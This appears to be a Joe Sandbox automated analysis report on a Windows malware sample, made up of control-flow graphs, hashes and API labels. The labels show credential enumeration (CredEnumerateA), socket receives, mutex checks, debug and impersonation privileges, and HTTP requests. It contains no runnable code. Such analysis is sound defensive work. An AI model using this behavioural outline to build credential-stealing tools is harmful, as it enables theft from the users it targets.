                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2398595512-0
                                                                                                    • Opcode ID: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
                                                                                                    • Instruction ID: 8e91eed5bb3c8123add7e3d94c943cfa03e0e6f2458ac8bfeff79b6f28bfc2b9
                                                                                                    • Opcode Fuzzy Hash: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
                                                                                                    • Instruction Fuzzy Hash: C9919032B08A0246F664AF25A814275A390EF8D7B4F9C4B71DA7E477D4DF7DE8018760

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1976 7ff75a6aca10-7ff75a6aca7a CredEnumerateA 1977 7ff75a6aca80-7ff75a6aca89 1976->1977 1978 7ff75a6ad49c-7ff75a6ad4cb call 7ff75a71e860 1976->1978 1980 7ff75a6ad48f-7ff75a6ad496 CredFree 1977->1980 1981 7ff75a6aca8f-7ff75a6acaa7 1977->1981 1980->1978 1983 7ff75a6acab0-7ff75a6acb02 call 7ff75a71e888 1981->1983 1986 7ff75a6acb08-7ff75a6acb2e 1983->1986 1987 7ff75a6acd4d-7ff75a6acd54 1983->1987 1988 7ff75a6acb30-7ff75a6acb38 1986->1988 1989 7ff75a6acfa9-7ff75a6acfb0 1987->1989 1990 7ff75a6acd5a-7ff75a6acd7e 1987->1990 1988->1988 1991 7ff75a6acb3a-7ff75a6acbf7 call 7ff75a6b86b0 call 7ff75a6b5310 call 7ff75a6b55e0 1988->1991 1992 7ff75a6acfb6-7ff75a6ad09f call 7ff75a6b86b0 call 7ff75a6b5310 call 7ff75a6b55e0 1989->1992 1993 7ff75a6ad1f7-7ff75a6ad1fa 1989->1993 1994 7ff75a6acd80-7ff75a6acd88 1990->1994 2023 7ff75a6acc00-7ff75a6acc08 1991->2023 2024 7ff75a6ad0a0-7ff75a6ad0a8 1992->2024 1998 7ff75a6ad200-7ff75a6ad28a 1993->1998 1999 7ff75a6ad473-7ff75a6ad489 call 7ff75a6b00f0 1993->1999 1994->1994 1997 7ff75a6acd8a-7ff75a6ace49 call 7ff75a6b86b0 call 7ff75a6b5310 call 7ff75a6b55e0 1994->1997 2029 7ff75a6ace50-7ff75a6ace58 1997->2029 2003 7ff75a6ad290-7ff75a6ad298 1998->2003 1999->1980 1999->1983 2003->2003 2005 7ff75a6ad29a-7ff75a6ad34b call 7ff75a6b86b0 call 7ff75a6b1900 2003->2005 2026 7ff75a6ad350-7ff75a6ad358 2005->2026 2023->2023 2027 7ff75a6acc0a-7ff75a6acc63 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 2023->2027 2024->2024 2028 7ff75a6ad0aa-7ff75a6ad103 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 2024->2028 2026->2026 2030 7ff75a6ad35a-7ff75a6ad3f8 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a71e888 call 7ff75a6d51b0 2026->2030 2055 7ff75a6acc65-7ff75a6acc76 2027->2055 2056 7ff75a6acc96-7ff75a6accb9 2027->2056 2057 7ff75a6ad105-7ff75a6ad116 2028->2057 2058 7ff75a6ad136-7ff75a6ad156 2028->2058 2029->2029 2033 7ff75a6ace5a-7ff75a6aceb3 call 7ff75a6b86b0 call 7ff75a6b6bc0 call 7ff75a6b3ff0 2029->2033 2122 7ff75a6ad404-7ff75a6ad419 call 7ff75a6b37f0 2030->2122 2123 7ff75a6ad3fa-7ff75a6ad3fc 2030->2123 2069 7ff75a6aceb5-7ff75a6acec6 2033->2069 2070 7ff75a6acee6-7ff75a6acf0c 2033->2070 2065 7ff75a6acc91 call 7ff75a71e880 2055->2065 2066 7ff75a6acc78-7ff75a6acc8b 2055->2066 2060 7ff75a6accbb-7ff75a6acccc 2056->2060 2061 7ff75a6accec-7ff75a6acd04 2056->2061 2067 7ff75a6ad131 call 7ff75a71e880 2057->2067 2068 7ff75a6ad118-7ff75a6ad12b 2057->2068 2062 7ff75a6ad158-7ff75a6ad16c 2058->2062 2063 7ff75a6ad18c-7ff75a6ad1ae 2058->2063 2077 7ff75a6acce7 call 7ff75a71e880 2060->2077 2078 7ff75a6accce-7ff75a6acce1 2060->2078 2083 7ff75a6acd06-7ff75a6acd18 2061->2083 2084 7ff75a6acd38-7ff75a6acd4a 2061->2084 2079 7ff75a6ad187 call 7ff75a71e880 2062->2079 2080 7ff75a6ad16e-7ff75a6ad181 2062->2080 2085 7ff75a6ad1e2-7ff75a6ad1f5 2063->2085 2086 7ff75a6ad1b0-7ff75a6ad1c2 2063->2086 2065->2056 2066->2065 2071 7ff75a6ad526-7ff75a6ad52b call 7ff75a708254 2066->2071 2067->2058 2068->2067 2072 7ff75a6ad54a-7ff75a6b6d9d call 7ff75a708254 2068->2072 2073 7ff75a6acee1 call 7ff75a71e880 2069->2073 2074 7ff75a6acec8-7ff75a6acedb 2069->2074 2081 7ff75a6acf42-7ff75a6acf63 2070->2081 2082 7ff75a6acf0e-7ff75a6acf22 2070->2082 2093 7ff75a6ad52c-7ff75a6ad531 call 7ff75a708254 2071->2093 2136 7ff75a6b6dd1-7ff75a6b6de4 2072->2136 2137 7ff75a6b6d9f 2072->2137 2073->2070 2074->2073 2090 7ff75a6ad538-7ff75a6ad53d call 7ff75a708254 2074->2090 2077->2061 2078->2077 2078->2093 2079->2063 2080->2079 2094 7ff75a6ad4cc-7ff75a6ad4d1 call 7ff75a708254 2080->2094 2099 7ff75a6acf65-7ff75a6acf76 2081->2099 2100 7ff75a6acf96-7ff75a6acfa6 2081->2100 2095 7ff75a6acf24-7ff75a6acf37 2082->2095 2096 7ff75a6acf3d call 7ff75a71e880 2082->2096 2101 7ff75a6acd33 call 7ff75a71e880 2083->2101 2102 7ff75a6acd1a-7ff75a6acd2d 2083->2102 2084->1987 2085->1998 2103 7ff75a6ad1c4-7ff75a6ad1d7 2086->2103 2104 7ff75a6ad1dd call 7ff75a71e880 2086->2104 2109 7ff75a6ad53e-7ff75a6ad543 call 7ff75a708254 2090->2109 2114 7ff75a6ad532-7ff75a6ad537 call 7ff75a708254 2093->2114 2132 7ff75a6ad4d2-7ff75a6ad51f call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 2094->2132 2095->2096 2095->2109 2096->2081 2112 7ff75a6acf91 call 7ff75a71e880 2099->2112 2113 7ff75a6acf78-7ff75a6acf8b 2099->2113 2100->1989 2101->2084 2102->2101 2102->2114 2103->2104 2115 7ff75a6ad520-7ff75a6ad525 call 7ff75a708254 2103->2115 2104->2085 2126 7ff75a6ad544-7ff75a6ad549 call 7ff75a708254 2109->2126 2112->2100 2113->2112 2113->2126 2114->2090 2115->2071 2141 7ff75a6ad41d-7ff75a6ad429 2122->2141 2123->2132 2133 7ff75a6ad402 2123->2133 2126->2072 2132->2115 2133->2141 2143 7ff75a6b6da0-7ff75a6b6dcf call 7ff75a6b9380 call 7ff75a6c9810 call 7ff75a71e880 2137->2143 2145 7ff75a6ad42b-7ff75a6ad44a 2141->2145 2146 7ff75a6ad44c-7ff75a6ad456 call 7ff75a6c0610 2141->2146 2143->2136 2149 7ff75a6ad45b-7ff75a6ad469 call 7ff75a6b3ff0 2145->2149 2146->2149 2149->1999
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Cred$EnumerateFree
                                                                                                    • String ID: cannot use push_back() with
                                                                                                    • API String ID: 1347986415-4122110429
                                                                                                    • Opcode ID: cdedf41afa139a65bbdff1316d74c29c97410966649d7b82ff0ebc9f70e81d4d
                                                                                                    • Instruction ID: c593c9357032801d91338f289ea34be729f66df08a211825e207b894c39d72f4
                                                                                                    • Opcode Fuzzy Hash: cdedf41afa139a65bbdff1316d74c29c97410966649d7b82ff0ebc9f70e81d4d
                                                                                                    • Instruction Fuzzy Hash: D3629172A04BC589EB209F24E8803ED7761FB89B98F544375EAAD07B99DF38D584C710

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2164 7ff75a6b9f80-7ff75a6b9fc5 2165 7ff75a6ba291-7ff75a6ba2cb call 7ff75a6c1e10 call 7ff75a6bc600 2164->2165 2166 7ff75a6b9fcb-7ff75a6b9ff5 call 7ff75a731650 2164->2166 2175 7ff75a6ba2d0-7ff75a6ba2d6 2165->2175 2172 7ff75a6ba004-7ff75a6ba03d call 7ff75a6bb5b0 call 7ff75a6c0c20 call 7ff75a6bc600 2166->2172 2173 7ff75a6b9ff7-7ff75a6ba000 2166->2173 2202 7ff75a6ba1d4-7ff75a6ba1db 2172->2202 2203 7ff75a6ba043-7ff75a6ba0c8 call 7ff75a6b86b0 call 7ff75a6bb780 call 7ff75a6c1af0 call 7ff75a6bbd00 2172->2203 2173->2172 2177 7ff75a6ba467-7ff75a6ba46b 2175->2177 2178 7ff75a6ba2dc-7ff75a6ba35b call 7ff75a6b86b0 call 7ff75a6bb780 call 7ff75a6c1af0 call 7ff75a6bbd00 2175->2178 2181 7ff75a6ba471-7ff75a6ba4ce call 7ff75a6b37f0 call 7ff75a6b3ff0 2177->2181 2182 7ff75a6ba539-7ff75a6ba540 2177->2182 2227 7ff75a6ba361-7ff75a6ba369 2178->2227 2228 7ff75a6ba5ab-7ff75a6ba5c7 call 7ff75a6b3e90 call 7ff75a720e88 2178->2228 2185 7ff75a6ba50d-7ff75a6ba538 call 7ff75a71e860 2181->2185 2211 7ff75a6ba4d0-7ff75a6ba4e5 2181->2211 2184 7ff75a6ba542-7ff75a6ba557 2182->2184 2182->2185 2190 7ff75a6ba559-7ff75a6ba56c 2184->2190 2191 7ff75a6ba4fc-7ff75a6ba508 call 7ff75a71e880 2184->2191 2196 7ff75a6ba576-7ff75a6ba57b call 7ff75a708254 2190->2196 2197 7ff75a6ba56e 2190->2197 2191->2185 2219 7ff75a6ba57c-7ff75a6ba598 call 7ff75a6b3e90 call 7ff75a720e88 2196->2219 2197->2191 2208 7ff75a6ba225-7ff75a6ba228 2202->2208 2209 7ff75a6ba1dd-7ff75a6ba223 call 7ff75a6b37f0 2202->2209 2203->2219 2258 7ff75a6ba0ce-7ff75a6ba0d6 2203->2258 2215 7ff75a6ba280-7ff75a6ba28c call 7ff75a6bb3d0 2208->2215 2216 7ff75a6ba22a-7ff75a6ba26b call 7ff75a6b37f0 2208->2216 2230 7ff75a6ba270-7ff75a6ba27f call 7ff75a6b3ff0 2209->2230 2211->2191 2218 7ff75a6ba4e7-7ff75a6ba4fa 2211->2218 2215->2185 2216->2230 2218->2191 2218->2196 2247 7ff75a6ba599-7ff75a6ba59e call 7ff75a708254 2219->2247 2234 7ff75a6ba39c-7ff75a6ba3e1 call 7ff75a7207d0 * 2 2227->2234 2235 7ff75a6ba36b-7ff75a6ba37c 2227->2235 2248 7ff75a6ba5c8-7ff75a6ba5cd call 7ff75a708254 2228->2248 2230->2215 2266 7ff75a6ba415-7ff75a6ba428 2234->2266 2267 7ff75a6ba3e3-7ff75a6ba3f5 2234->2267 2241 7ff75a6ba397 call 7ff75a71e880 2235->2241 2242 7ff75a6ba37e-7ff75a6ba391 2235->2242 2241->2234 2242->2241 2242->2248 2265 7ff75a6ba59f-7ff75a6ba5a4 call 7ff75a708254 2247->2265 2264 7ff75a6ba5ce-7ff75a6ba5e6 call 7ff75a708254 2248->2264 2262 7ff75a6ba10a-7ff75a6ba150 call 7ff75a7207d0 * 2 2258->2262 2263 7ff75a6ba0d8-7ff75a6ba0ea 2258->2263 2295 7ff75a6ba152-7ff75a6ba163 2262->2295 2296 7ff75a6ba183-7ff75a6ba195 2262->2296 2268 7ff75a6ba105 call 7ff75a71e880 2263->2268 2269 7ff75a6ba0ec-7ff75a6ba0ff 2263->2269 2286 7ff75a6ba5f3 2264->2286 2287 7ff75a6ba5e8-7ff75a6ba5eb 2264->2287 2288 7ff75a6ba5a5-7ff75a6ba5aa call 7ff75a708254 2265->2288 2275 7ff75a6ba42a-7ff75a6ba43c 2266->2275 2276 7ff75a6ba45c-7ff75a6ba462 2266->2276 2273 7ff75a6ba410 call 7ff75a71e880 2267->2273 2274 7ff75a6ba3f7-7ff75a6ba40a 2267->2274 2268->2262 2269->2247 2269->2268 2273->2266 2274->2264 2274->2273 2277 7ff75a6ba457 call 7ff75a71e880 2275->2277 2278 7ff75a6ba43e-7ff75a6ba451 2275->2278 2276->2177 2277->2276 2278->2277 2284 7ff75a6ba570-7ff75a6ba575 call 7ff75a708254 2278->2284 2284->2196 2287->2286 2288->2228 2297 7ff75a6ba165-7ff75a6ba178 2295->2297 2298 7ff75a6ba17e call 7ff75a71e880 2295->2298 2299 7ff75a6ba1c9-7ff75a6ba1cf 2296->2299 2300 7ff75a6ba197-7ff75a6ba1a9 2296->2300 2297->2265 2297->2298 2298->2296 2299->2202 2301 7ff75a6ba1c4 call 7ff75a71e880 2300->2301 2302 7ff75a6ba1ab-7ff75a6ba1be 2300->2302 2301->2299 2302->2288 2302->2301
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                    • String ID: value
                                                                                                    • API String ID: 1346393832-494360628
                                                                                                    • Opcode ID: 3e54b0dc01a401ce8642f37316c843054398c55b0e4cf8c14dc2c7335e535bb8
                                                                                                    • Instruction ID: e55880791f15846112e834e7d501bcd309dcbef56f96fb125f03a4564d2f46bf
                                                                                                    • Opcode Fuzzy Hash: 3e54b0dc01a401ce8642f37316c843054398c55b0e4cf8c14dc2c7335e535bb8
                                                                                                    • Instruction Fuzzy Hash: 6102C363A18BC585FB00EB74E4403ADA761EF957A4F985271FA9D02ADADF3CD581C310

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2374 7ff75a6f4a30-7ff75a6f4a92 call 7ff75a71f520 call 7ff75a6fc190 2379 7ff75a6f4a94 2374->2379 2380 7ff75a6f4a97-7ff75a6f4ae1 call 7ff75a6b5310 call 7ff75a6b4fe0 2374->2380 2379->2380 2385 7ff75a6f4b15-7ff75a6f4b34 2380->2385 2386 7ff75a6f4ae3-7ff75a6f4af5 2380->2386 2389 7ff75a6f4b36-7ff75a6f4b4b 2385->2389 2390 7ff75a6f4b6b-7ff75a6f4bef call 7ff75a6f0e00 call 7ff75a731650 2385->2390 2387 7ff75a6f4b10 call 7ff75a71e880 2386->2387 2388 7ff75a6f4af7-7ff75a6f4b0a 2386->2388 2387->2385 2388->2387 2392 7ff75a6f51fc-7ff75a6f5201 call 7ff75a708254 2388->2392 2394 7ff75a6f4b66 call 7ff75a71e880 2389->2394 2395 7ff75a6f4b4d-7ff75a6f4b60 2389->2395 2406 7ff75a6f4bf4-7ff75a6f4c14 recv 2390->2406 2398 7ff75a6f5202-7ff75a6f5207 call 7ff75a708254 2392->2398 2394->2390 2395->2394 2395->2398 2405 7ff75a6f5208-7ff75a6f520d call 7ff75a708254 2398->2405 2417 7ff75a6f520e-7ff75a6f5213 call 7ff75a708254 2405->2417 2408 7ff75a6f4c1a-7ff75a6f4c36 2406->2408 2409 7ff75a6f4cd7-7ff75a6f4d19 2406->2409 2411 7ff75a6f4c76-7ff75a6f4c92 call 7ff75a6b9030 2408->2411 2412 7ff75a6f4c38-7ff75a6f4c74 call 7ff75a730fb0 2408->2412 2413 7ff75a6f5011-7ff75a6f5029 2409->2413 2414 7ff75a6f4d1f 2409->2414 2425 7ff75a6f4c97-7ff75a6f4ca0 2411->2425 2412->2425 2415 7ff75a6f502f-7ff75a6f5095 call 7ff75a6bb220 call 7ff75a6f0e00 2413->2415 2416 7ff75a6f5220-7ff75a6f5225 call 7ff75a69b8e0 2413->2416 2420 7ff75a6f4d20-7ff75a6f4d2c call 7ff75a7089b0 2414->2420 2443 7ff75a6f50c9-7ff75a6f50cf 2415->2443 2444 7ff75a6f5097-7ff75a6f50a9 2415->2444 2436 7ff75a6f5226-7ff75a6f522b call 7ff75a708254 2416->2436 2435 7ff75a6f5214-7ff75a6f5219 call 7ff75a708254 2417->2435 2432 7ff75a6f5005-7ff75a6f500b 2420->2432 2433 7ff75a6f4d32-7ff75a6f4d35 2420->2433 2425->2406 2430 7ff75a6f4ca6-7ff75a6f4cd3 2425->2430 2430->2409 2432->2413 2432->2420 2433->2432 2438 7ff75a6f4d3b-7ff75a6f4dec call 7ff75a6b6700 call 7ff75a6e0040 call 7ff75a6b37f0 call 7ff75a6f0e90 call 7ff75a6fc190 2433->2438 2450 7ff75a6f521a-7ff75a6f521f call 7ff75a708254 2435->2450 2446 7ff75a6f522c-7ff75a6f5231 call 7ff75a708254 2436->2446 2483 7ff75a6f4df1-7ff75a6f4e7d call 7ff75a6b5310 call 7ff75a6b3d70 call 7ff75a6f0e00 2438->2483 2484 7ff75a6f4dee 2438->2484 2451 7ff75a6f50d4-7ff75a6f50fc recv 2443->2451 2448 7ff75a6f50c4 call 7ff75a71e880 2444->2448 2449 7ff75a6f50ab-7ff75a6f50be 2444->2449 2465 7ff75a6f5232-7ff75a6f5237 call 7ff75a708254 2446->2465 2448->2443 2449->2436 2449->2448 2450->2416 2456 7ff75a6f5104-7ff75a6f5117 WSACleanup 2451->2456 2457 7ff75a6f50fe closesocket 2451->2457 2461 7ff75a6f514e-7ff75a6f5176 2456->2461 2462 7ff75a6f5119-7ff75a6f512e 2456->2462 2457->2456 2463 7ff75a6f51ad-7ff75a6f51fb call 7ff75a71e860 2461->2463 2464 7ff75a6f5178-7ff75a6f518d 2461->2464 2467 7ff75a6f5130-7ff75a6f5143 2462->2467 2468 7ff75a6f5149 call 7ff75a71e880 2462->2468 2470 7ff75a6f518f-7ff75a6f51a2 2464->2470 2471 7ff75a6f51a8 call 7ff75a71e880 2464->2471 2467->2446 2467->2468 2468->2461 2470->2465 2470->2471 2471->2463 2490 7ff75a6f4e82-7ff75a6f4e92 2483->2490 2484->2483 2491 7ff75a6f4ec6-7ff75a6f4ee4 2490->2491 2492 7ff75a6f4e94-7ff75a6f4ea6 2490->2492 2495 7ff75a6f4ee6-7ff75a6f4efb 2491->2495 2496 7ff75a6f4f1b-7ff75a6f4f38 2491->2496 2493 7ff75a6f4ec1 call 7ff75a71e880 2492->2493 2494 7ff75a6f4ea8-7ff75a6f4ebb 2492->2494 2493->2491 2494->2405 2494->2493 2500 7ff75a6f4f16 call 7ff75a71e880 2495->2500 2501 7ff75a6f4efd-7ff75a6f4f10 2495->2501 2497 7ff75a6f4f6f-7ff75a6f4fb8 call 7ff75a6b3ff0 * 2 2496->2497 2498 7ff75a6f4f3a-7ff75a6f4f4f 2496->2498 2510 7ff75a6f4fef-7ff75a6f5000 2497->2510 2511 7ff75a6f4fba-7ff75a6f4fcf 2497->2511 2502 7ff75a6f4f51-7ff75a6f4f64 2498->2502 2503 7ff75a6f4f6a call 7ff75a71e880 2498->2503 2500->2496 2501->2417 2501->2500 2502->2435 2502->2503 2503->2497 2510->2451 2512 7ff75a6f4fd1-7ff75a6f4fe4 2511->2512 2513 7ff75a6f4fea call 7ff75a71e880 2511->2513 2512->2450 2512->2513 2513->2510
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$recv$Cleanupclosesocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 3402187201-0
                                                                                                    • Opcode ID: 12860b5ddff3f34fd62ad53aec26b9849f54247f596dc9dee8b20d445a1b2cd2
                                                                                                    • Instruction ID: 60bbfa91ea6db182a745b349071ef0c5bbe00b975b9290930d406df09884d083
                                                                                                    • Opcode Fuzzy Hash: 12860b5ddff3f34fd62ad53aec26b9849f54247f596dc9dee8b20d445a1b2cd2
                                                                                                    • Instruction Fuzzy Hash: DB128472A1CBC681FA20AB14E4443EEA752FF89B90F945671D6AD02AD9DF7CD481C710

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2515 7ff75a6ec600-7ff75a6ec622 call 7ff75a6ef820 2518 7ff75a6ec624-7ff75a6ec647 call 7ff75a6efb60 call 7ff75a6fa780 call 7ff75a6b2660 ExitProcess 2515->2518 2519 7ff75a6ec64e-7ff75a6ec700 call 7ff75a6fb9b0 * 2 call 7ff75a6f8030 call 7ff75a6ed030 2515->2519 2534 7ff75a6ec734-7ff75a6ec76b OpenMutexA 2519->2534 2535 7ff75a6ec702-7ff75a6ec714 2519->2535 2536 7ff75a6ec76d-7ff75a6ec772 ExitProcess 2534->2536 2537 7ff75a6ec779-7ff75a6ec7b0 CreateMutexExA call 7ff75a6e66f0 call 7ff75a6efca0 2534->2537 2538 7ff75a6ec716-7ff75a6ec729 2535->2538 2539 7ff75a6ec72f call 7ff75a71e880 2535->2539 2550 7ff75a6ec7b2-7ff75a6ec7b7 ExitProcess 2537->2550 2551 7ff75a6ec7be-7ff75a6ec821 call 7ff75a6f8330 call 7ff75a6ad570 call 7ff75a6ae610 call 7ff75a6aecb0 call 7ff75a6af9e0 call 7ff75a6aca10 call 7ff75a6dcab0 call 7ff75a6df7a0 call 7ff75a6a1b90 call 7ff75a6aadd0 call 7ff75a6a9680 call 7ff75a6ed260 call 7ff75a6abf40 call 7ff75a6a77d0 call 7ff75a6a4b70 call 7ff75a6a7aa0 call 7ff75a6f4a30 2537->2551 2538->2539 2541 7ff75a6ec8c6-7ff75a6ec8cb call 7ff75a708254 2538->2541 2539->2534 2547 7ff75a6ec8cc-7ff75a6ec8d1 call 7ff75a708254 2541->2547 2588 7ff75a6ec826-7ff75a6ec836 call 7ff75a6ebcc0 2551->2588 2592 7ff75a6ec84a-7ff75a6ec851 2588->2592 2593 7ff75a6ec838-7ff75a6ec844 ReleaseMutex CloseHandle 2588->2593 2594 7ff75a6ec853-7ff75a6ec858 call 7ff75a6ec8e0 2592->2594 2595 7ff75a6ec859-7ff75a6ec865 2592->2595 2593->2592 2594->2595 2597 7ff75a6ec895-7ff75a6ec8c5 call 7ff75a71e860 2595->2597 2598 7ff75a6ec867-7ff75a6ec879 2595->2598 2600 7ff75a6ec890 call 7ff75a71e880 2598->2600 2601 7ff75a6ec87b-7ff75a6ec88e 2598->2601 2600->2597 2601->2547 2601->2600
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$ExitOpenToken$CloseCurrentFileHandleInformationInitializeModuleMutexName
                                                                                                    • String ID: SeDebugPrivilege$SeImpersonatePrivilege
                                                                                                    • API String ID: 3348294976-3768118664
                                                                                                    • Opcode ID: d5d44ca92a040ee4e410c958502b53e018e993706342e0dca52848d24418983b
                                                                                                    • Instruction ID: 15a6c6dd489e74a55e8b2c99d889e42b3379c261814c70905dbc1b07b5629bc9
                                                                                                    • Opcode Fuzzy Hash: d5d44ca92a040ee4e410c958502b53e018e993706342e0dca52848d24418983b
                                                                                                    • Instruction Fuzzy Hash: 5B61F621E0CA8381FB10BB64A4113BFE352FF99B80FD845B5E69E426D6DF2CE4418760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$Query$AvailableDataHttpInfoOpen_invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskFileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352168858-0
                                                                                                    • Opcode ID: 588572fb0266df13e665af572d70418bb49ee0589e6a4750570cf6cdd49d9c4e
                                                                                                    • Instruction ID: d85c4cf809fb80dd85f593a0ca2d03cf6a1253a6c5e0c75126a94abb050e62e4
                                                                                                    • Opcode Fuzzy Hash: 588572fb0266df13e665af572d70418bb49ee0589e6a4750570cf6cdd49d9c4e
